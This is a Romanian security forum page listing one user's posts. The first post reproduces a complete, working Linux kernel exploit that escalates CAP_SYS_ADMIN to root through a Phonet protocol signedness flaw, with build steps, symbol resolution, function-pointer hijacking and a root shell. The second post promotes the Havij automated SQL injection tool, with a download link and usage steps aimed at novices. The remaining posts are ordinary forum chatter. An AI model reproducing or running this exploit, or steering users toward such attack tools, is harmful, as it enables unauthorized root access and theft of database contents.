Everything posted by Nytro

  1. Linux Kernel CAP_SYS_ADMIN to root Exploit Nu m-am uitat inca peste el, cand am timp vad care e treaba.
/*
 * Linux Kernel CAP_SYS_ADMIN to root exploit
 * by Dan Rosenberg
 * @djrbliss on twitter
 *
 * Usage:
 * gcc -w caps-to-root.c -o caps-to-root
 *   (on a 64-bit host add -m32: the payload uses 32-bit inline assembly)
 * sudo setcap cap_sys_admin+ep caps-to-root
 * ./caps-to-root
 *
 * This exploit is NOT stable:
 *
 * * It only works on 32-bit x86 machines
 *
 * * It only works on >= 2.6.34 kernels (it could probably be ported back, but
 *   it involves winning a race condition)
 *
 * * It requires symbol support for symbols that aren't included by default in
 *   several distributions
 *
 * * It requires the Phonet protocol, which may not be compiled on some
 *   distributions
 *
 * * You may experience problems on multi-CPU systems
 *
 * It has been tested on a stock Ubuntu 10.10 installation. I wouldn't be
 * surprised if it doesn't work on other distributions.
 *
 * ----
 *
 * Lately there's been a lot of talk about how a large subset of Linux
 * capabilities are equivalent to root. CAP_SYS_ADMIN is a catch-all
 * capability that, among other things, allows mounting filesystems and
 * injecting commands into an administrator's shell - in other words, it
 * trivially allows you to get root. However, I found another way to get root
 * from CAP_SYS_ADMIN...the hard way.
 *
 * This exploit leverages a signedness error in the Phonet protocol. By
 * specifying a negative protocol index, I can craft a series of fake
 * structures in userspace and cause the incrementing of an arbitrary kernel
 * address, which I then leverage to execute arbitrary kernel code.
 *
 * Greets to spender, cloud, jono, kees, pipacs, redpig, taviso, twiz, stealth,
 * and bla.
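*/
#include <stdio.h>
#include <fcntl.h>
#include <sys/socket.h>
#include <sys/ioctl.h>      /* ioctl() was used without a prototype */
#include <errno.h>
#include <string.h>
#include <linux/capability.h>
#include <sys/utsname.h>
#include <sys/mman.h>
#include <unistd.h>

/*
 * Kernel credential helpers, resolved at run time from /proc/kallsyms.
 * regparm(3) matches the 32-bit x86 kernel calling convention; the exploit
 * is 32-bit only (see the header comment and the inline assembly below).
 */
typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);

_commit_creds commit_creds;
_prepare_kernel_cred prepare_kernel_cred;

/*
 * Ring-0 payload: prepare_kernel_cred(0) builds a root credential set and
 * commit_creds() installs it on the calling task. Only meaningful when
 * reached from kernel context (see konami()).
 */
int getroot(void)
{
    commit_creds(prepare_kernel_cred(0));
    return 0;
}

/*
 * The code that gets copied into the user-space landing page and executed
 * by the hijacked ioctl function pointer. The register shuffling is a no-op
 * joke; the only effective instructions are the absolute load of getroot's
 * address and the indirect call. push/pop of %ebx/%eax only assemble in
 * 32-bit mode.
 */
int konami(void)
{
    /* Konami code! */
    asm("inc %edx;"          /* UP */
        "inc %edx;"          /* UP */
        "dec %edx;"          /* DOWN */
        "dec %edx;"          /* DOWN */
        "shl %edx;"          /* LEFT */
        "shr %edx;"          /* RIGHT */
        "shl %edx;"          /* LEFT */
        "shr %edx;"          /* RIGHT */
        "push %ebx;"         /* B */
        "pop %ebx;"
        "push %eax;"         /* A */
        "pop %eax;"
        "mov $getroot, %ebx;"
        "call *%ebx;");      /* START */
    return 0;
}

/* thanks spender... */
/*
 * Look a symbol up by name in /proc/kallsyms, falling back to the old
 * /proc/ksyms layout. Returns the address, or 0 when the file cannot be
 * opened or the symbol is not listed. Prints the resolved address on success.
 *
 * Fixes against the original: `ret` was read uninitialized by the first
 * while() test, and every "%s" conversion was unbounded while sname is 512
 * bytes. NOTE(review): a kernel that hides addresses from unprivileged
 * readers prints 0 here, which the caller already treats as "unresolved".
 */
unsigned long get_kernel_sym(const char *name)
{
    FILE *f;
    void *paddr = NULL;
    unsigned long addr = 0;
    char dummy;
    char sname[512];
    int ret = 0;
    int oldstyle = 0;

    f = fopen("/proc/kallsyms", "r");
    if (f == NULL) {
        f = fopen("/proc/ksyms", "r");
        if (f == NULL)
            return 0;
        oldstyle = 1;
    }

    while (ret != EOF) {
        if (!oldstyle) {
            ret = fscanf(f, "%p %c %511s\n", &paddr, &dummy, sname);
        } else {
            ret = fscanf(f, "%p %511s\n", &paddr, sname);
            if (ret == 2) {
                char *p;

                /* skip the per-module entries of the old format */
                if (strstr(sname, "_O/") || strstr(sname, "_S."))
                    continue;
                /* strip a trailing "_smp" style suffix */
                p = strrchr(sname, '_');
                if (p > ((char *)sname + 5) && !strncmp(p - 3, "smp", 3)) {
                    p = p - 4;
                    while (p > (char *)sname && *(p - 1) == '_')
                        p--;
                    *p = '\0';
                }
            }
        }
        addr = (unsigned long)paddr;

        if (ret == 0) {
            /* unparsable line: swallow one token and move on */
            if (fscanf(f, "%511s\n", sname) == EOF)
                break;
            continue;
        }

        if (!strcmp(name, sname)) {
            fprintf(stdout, " [+] Resolved %s to %p\n", name, (void *)addr);
            fclose(f);
            return addr;
        }
    }

    fclose(f);
    return 0;
}

/*
 * Exploit driver.
 *
 *  1. Open a Phonet socket: EPERM means no CAP_SYS_ADMIN; success also loads
 *     the module so its symbols appear in /proc/kallsyms.
 *  2. Resolve proto_tab, phonet_dgram_ops, pn_socket_ioctl and the cred
 *     helpers; bail out if any is missing.
 *  3. Compute a negative protocol index so that proto_tab[proto] lands in a
 *     user mapping holding fake phonet_protocol -> proto -> module structs.
 *  4. Dry run against a scratch mapping to learn which byte of the fake
 *     "module" the kernel increments.
 *  5. Aim that increment at the top byte of the ioctl slot in
 *     phonet_dgram_ops and bump it until the pointer is in user space.
 *  6. Map the payload at that address and trigger it with ioctl() on the
 *     socket; check getuid() and exec a shell.
 *
 * Returns -1 on any failure. On success execl() replaces the process and
 * main() does not return; if execl() fails, reports it and returns -1.
 *
 * NOTE(review): the payload executes from a user mapping, so this technique
 * is expected to fail on CPUs/kernels that forbid kernel execution of user
 * pages (SMEP) - consistent with the "Ubuntu 10.10, 32-bit" scope above.
 */
int main(int argc, char * argv[])
{
    int sock, proto, i, offset = -1;
    unsigned long proto_tab, landing, target, pn_ops, pn_ioctl, *ptr;
    void *map;

    /* Create a socket to load the module for symbol support */
    printf("[*] Testing Phonet support and CAP_SYS_ADMIN...\n");
    sock = socket(PF_PHONET, SOCK_DGRAM, 0);
    if (sock < 0) {
        if (errno == EPERM)
            printf("[*] You don't have CAP_SYS_ADMIN.\n");
        else
            printf("[*] Failed to open Phonet socket.\n");
        return -1;
    }

    /* Resolve kernel symbols */
    printf("[*] Resolving kernel symbols...\n");
    proto_tab = get_kernel_sym("proto_tab");
    pn_ops = get_kernel_sym("phonet_dgram_ops");
    pn_ioctl = get_kernel_sym("pn_socket_ioctl");
    commit_creds = (_commit_creds)get_kernel_sym("commit_creds");
    prepare_kernel_cred = (_prepare_kernel_cred)get_kernel_sym("prepare_kernel_cred");

    if (!proto_tab || !commit_creds || !prepare_kernel_cred || !pn_ops || !pn_ioctl) {
        printf("[*] Failed to resolve kernel symbols.\n");
        return -1;
    }

    /*
     * Thanks bla, for reminding me how to do basic math.
     * Index such that proto_tab + proto * sizeof(void *) wraps around to
     * the user-space landing page. The sign bit is set with an unsigned
     * constant: `1 << 31` overflows a 32-bit int, which is undefined.
     */
    landing = 0x20000000;
    proto = (int)(0x80000000UL | ((landing - proto_tab) >> 2));

    /* Map the landing page for the fake structures */
    printf("[*] Preparing fake structures...\n");
    map = mmap((void *)landing, 0x10000, PROT_READ | PROT_WRITE | PROT_EXEC,
               MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, -1, 0);
    if (map == MAP_FAILED) {
        printf("[*] Failed to map landing area.\n");
        return -1;
    }

    /* Pointer to phonet_protocol struct */
    ptr = (unsigned long *)landing;
    ptr[0] = (unsigned long)&ptr[1];

    /* phonet_protocol struct: every field points at the fake proto */
    for (i = 1; i < 4; i++)
        ptr[i] = (unsigned long)&ptr[4];

    /* proto struct: every field points at the fake module */
    for (i = 4; i < 204; i++)
        ptr[i] = (unsigned long)&ptr[204];

    /* First, do a test run to calculate any offsets */
    target = 0x30000000;

    /* module struct: every field points at the scratch area */
    for (i = 204; i < 404; i++)
        ptr[i] = target;

    /* Map the scratch area the dry run writes into */
    map = mmap((void *)0x30000000, 0x2000000, PROT_READ | PROT_WRITE | PROT_EXEC,
               MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, -1, 0);
    if (map == MAP_FAILED) {
        printf("[*] Failed to map landing area.\n");
        return -1;
    }

    printf("[*] Calculating offsets...\n");
    /* Return value deliberately ignored: only the kernel-side increment matters */
    socket(PF_PHONET, SOCK_DGRAM, proto);

    /* Find the first word the kernel touched; its byte offset is what we need */
    ptr = (unsigned long *)0x30000000;
    for (i = 0; i < 0x800000; i++) {
        if (ptr[i] != 0) {
            offset = i * sizeof(void *);
            break;
        }
    }
    if (offset == -1) {
        printf("[*] Test run failed.\n");
        return -1;
    }

    /*
     * MSB of pn_ioctl: the ioctl slot is the 10th word of proto_ops, so its
     * top byte (little-endian) is the last byte of that word; subtract the
     * measured offset so the kernel's increment lands exactly there.
     */
    target = pn_ops + 10 * sizeof(void *) - 1 - offset;

    /* Re-fill the module struct */
    ptr = (unsigned long *)landing;
    for (i = 204; i < 404; i++)
        ptr[i] = target;

    /*
     * Push pn_ioctl fptr into userspace: each socket() call bumps the top
     * byte of the kernel's copy by one; `landing` tracks it locally until
     * the pointer reads 0x10xxxxxx.
     */
    printf("[*] Modifying function pointer...\n");
    landing = pn_ioctl;
    while ((landing & 0xff000000) != 0x10000000) {
        socket(PF_PHONET, SOCK_DGRAM, proto);
        landing += 0x01000000;
    }

    /* Map the page the hijacked pointer now refers to */
    map = mmap((void *)(landing & ~0xfffUL), 0x10000, PROT_READ | PROT_WRITE | PROT_EXEC,
               MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, -1, 0);
    if (map == MAP_FAILED) {
        printf("[*] Failed to map payload area.\n");
        return -1;
    }

    /* Copy payload: 1024 bytes starting at konami(), which includes the call to getroot() */
    memcpy((void *)landing, (void *)&konami, 1024);

    printf("[*] Executing Konami code at ring0...\n");
    ioctl(sock, 0, NULL);

    if (getuid()) {
        printf("[*] Exploit failed to get root.\n");
        return -1;
    }

    printf("[*] Konami code worked! Have a root shell.\n");
    execl("/bin/sh", "/bin/sh", NULL);

    /* execl() only returns on failure; the original fell off the end here */
    perror("[*] execl");
    return -1;
}
Sursa: Linux Kernel CAP_SYS_ADMIN to root Exploit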
  2. Havij v1.14 Advanced SQL Injection Jan 08, 2011 Description: Havij is an automated SQL Injection tool that helps penetration testers to find and exploit SQL Injection vulnerabilities on a web page. It can take advantage of a vulnerable web application. By using this software the user can fingerprint the back-end database, retrieve DBMS users and password hashes, dump tables and columns, fetch data from the database, run SQL statements and even access the underlying file system and execute commands on the operating system. The power of Havij that makes it different from similar tools is its injection methods. The success rate is more than 95% at injecting vulnerable targets using Havij. The user-friendly GUI (Graphical User Interface) of Havij and its automated settings and detections make it easy to use for everyone, even amateur users. What's New? * Sybase (ASE) database added. * Sybase (ASE) Blind database added. * Time based method for MsSQL added. * Time based method for MySQL added. * mod_security bypass added. * Pause button added. * Basic authentication added. * Digest authentication added. * Post Data field added. * bugs related with dot character in database name fixed. * syntax overwriting when defined by user in blind injections fixed. * mssql database detection from error when using JDBC driver corrected. * time out bug in md5 cracker fixed. * default value bug fixed. * string encode bug fixed in PostgreSQL. * injecting URL rewrite pages added. * injecting into any part of the http request like Cookie, User-Agent, Referer, etc. made available. * a bug in finding string column fixed (especially for MySQL). * Finding columns count in mysql when input value is non effective added. * window resize bug in custom DPI setting fixed. * some bugs in finding row count fixed. * getting database name in mssql error based when injection type is guessed integer but it's string fixed.
Features: http://itsecteam.com/en/projects/project1.htm How to use: This tool is for exploiting SQL Injection bugs in web applications. To use this tool you should know a little about SQL injection. Enter the target URL, select the HTTP method, then click Analyze. Note: the target URL should be a valid input that returns a normal page, not a 404 or an error page. Download: http://itsecteam.com/files/havij/Havij1.14Free.rar Hai baieti, fiti 1337 (script-kiddie...), aratati ca sunteti in stare sa folositi un program si vreau sa vad aere de mari hackeri la Show Off PS: Nu l-am incercat, nu stiu daca e infectat, dar cum il veti descarca de pe site-ul oficial cred ca nu este nici o problema (oricum, e un binar Windows closed-source - rulati-l intr-o masina virtuala daca nu aveti incredere in el).
  3. Deocamdata nu am timp, o sa incep sesiunea, dar dupa sesiune o sa aloc mai mult timp pentru RST (daca nu ma angajez undeva) si treburile vor merge mai bine.
  4. Nytro

    Categorie noua

    Si cam ce anume s-ar posta acolo? Ce ati posta de exemplu? Vreau niste exemple concrete. Ceva imi spune ca va fi cam pustie acea categorie.
  5. Poate nu au poze clare cu acea galaxie si au vrut doar sa arate o imagine asemanatoare acelei galaxii. Ma refer la faptul ca este posibil sa aiba multe informatii despre acea galaxie, dar nu o fotografie concreta care sa fie relativ clara si care sa poata fi afisata publicului larg, astfel au creat acea imagine mai mult descriptiva a acelei fotografii.
  6. Normal, stiri gen "Cancan", adica de 2 lei. Nici eu nu as vrea sa se inchida. Poti afla incredibil de multe informatii despre prieteni, despre cum gandesc, despre ce fac, tot felul de prostii.
  7. Multumesc tuturor si la multi ani celorlalti membri care isi serbeaza azi ziua de nastere. Sa beti ceva si pentru mine, si eu o sa beau ceva pentru voi. romanu: Nu toti moderatorii/administratorii sunt Ioni PS: Ma puteti injura, critica etc. Nu ma supar, nu dau warn/ban. Hai, cat aveti ocazia :->
  8. Haaa mersi boss, la multi ani si tie bre, sa ne traiesti. :-> Trebuie sa ne dam de baut unu altuia. Oricum inca trebuie sa iti dau 2 beri Mersi baieti. Azi nu dau banuri/warnuri
  9. Sunt usoare, doar 9 e greu, trebuie sa faci Backtracking.
  10. Warn tuturor. E treaba administratorilor si a moderatorilor asta. Ati facut offtopic toti
  11. Toate sunt JavaScript. Nu sunt grele, trebuie doar putina imaginatie. Deocamdata sunt la nivelul 9, cred ca trec mai departe maine. http://www.telerie-effegibi.it/daniele/default.asp?lev=1 Bafta.
  12. Nytro

    De ce piratati?

    Windows? Nu, Linux. Si asta inseamna: nici un program piratat. Doar muzica (manele) mai descarc din cand in cand, si filme. De ce sa dau bani pe ceva cand pot avea gratis? E modul clasic si practic de a gandi.
  13. Nytro

    De ce piratati?

    Nu piratam (poate doar unii dintre noi, intr-o mica masura), noi doar folosim produse piratate de altii, de fapt noi suntem victime ale pirateriei
  14. Ubuntu, Mandriva. Poti cauta tutoriale de instalare si de folosire, sunt o gramada.
  15. Acrobat Reader, adica Adobe Reader, pentru a putea vizualiza fisiere PDF. Desi sunt si multe alte alternative.
  16. Pare mai serios decat Blackbuntu, dar lista de tool-uri preinstalate este mai mica, si nu cred ca ma refer numai la cele de pentest. Hmm, sunt sigur ca o sa il incerc, dar deocamdata raman la ce am. Oricum, din moment ce e bazat pe Ubuntu e clar ca e extrem de prietenos cu utilizatorii, deci nu cred ca e o problema sa il foloseasca si cei care nu au mai folosit Linux pana acum.
  17. Pacaleala de 1 aprilie? Dupa atata timp se mai gaseste un ratat care sa redeschida topicul.
  18. Si cum face toata Europa sa dispara? Imprastie lava pe mii de kilometri? Poate fumul sa se imprastie in toata lumea si sa provoace cine stie ce "iarna nucleara", dar nu vad cum ar putea face sa dispara Europa.
  19. De cea de astazi, de la ora 10.
  20. Sa vedem: informatie, securitate, atac, programare, gratuit, distractie, profit, acces. Cred ca ar fi multe de spus.
  21. Nytro

    Text header

    Ar fi de preferat in limba romana. De fapt cred ca merge mai bine in engleza. Adica e "Romanian Security Team" nu "Echipa Romana de Securitate"
  22. Nytro

    Text header

    "Accesul la informatie este un drept, noi sustinem acest drept."
  23. Nytro

    Text header

    Am ales cateva texte mai interesante din topicul de la Anunturi, si supunem la vot, sa vedem ce text va aparea pe header. Ideea ar fi sa se potriveasca cat mai bine in contextul de fata, de aceea nu vedeti la optiunile de votare "To be, or not to be...". Deci ganditi putin inainte de a vota.
  24. Stirile trebuie sa fie din domeniul IT, nu numai "security"
  25. M-am referit la toata lumea, dar in special la cei care vin cu tot felul de sugestii si comenteaza la adresa celorlalti. Daca vrei sa te faci util, si ai timp, poti face un tutorial, e doar o sugestie. Si nu e adresata numai tie, ci tuturor.